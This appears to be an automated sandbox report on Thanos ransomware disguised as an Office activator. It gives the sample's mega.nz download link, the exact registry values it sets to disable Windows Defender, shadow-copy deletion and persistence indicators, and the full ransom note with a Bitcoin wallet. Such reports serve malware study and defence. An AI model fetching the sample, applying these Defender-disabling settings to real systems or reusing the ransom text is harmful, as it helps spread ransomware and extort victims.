Malware Analysis Report

2024-11-13 15:33

Sample ID 241108-v1g32awdld
Target https://mega.nz/file/9oYFjCZA#ChQlTD2yXk-a0E8r1dywSIfxnRiaxkvwtfccnwYyc0A
Tags
thanos defense_evasion discovery evasion execution impact persistence ransomware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://mega.nz/file/9oYFjCZA#ChQlTD2yXk-a0E8r1dywSIfxnRiaxkvwtfccnwYyc0A was found to be: Known bad.

Malicious Activity Summary

thanos defense_evasion discovery evasion execution impact persistence ransomware trojan

Disables service(s)

Thanos family

Thanos Ransomware

Thanos executable

Modifies Windows Defender Real-time Protection settings

Contains code to disable Windows Defender

Deletes shadow copies

Renames multiple (52) files with added filename extension

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Drops startup file

Windows security modification

Network Service Discovery

Legitimate hosting services abused for malware hosting/C2

Modifies WinLogon

Launches sc.exe

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Kills process with taskkill

NTFS ADS

Suspicious use of FindShellTrayWindow

Interacts with shadow copies

Runs net.exe

Runs ping.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 17:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 17:27

Reported

2024-11-08 17:28

Platform

win10v2004-20241007-en

Max time kernel

78s

Max time network

85s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://mega.nz/file/9oYFjCZA#ChQlTD2yXk-a0E8r1dywSIfxnRiaxkvwtfccnwYyc0A

Signatures

Contains code to disable Windows Defender


Disables service(s)

evasion execution

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Thanos Ransomware

ransomware thanos

Thanos executable


Thanos family

thanos

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (52) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." C:\Users\Admin\Desktop\OfficeActivator.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" C:\Users\Admin\Desktop\OfficeActivator.exe N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\arp.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 149254.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\Desktop\OfficeActivator.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
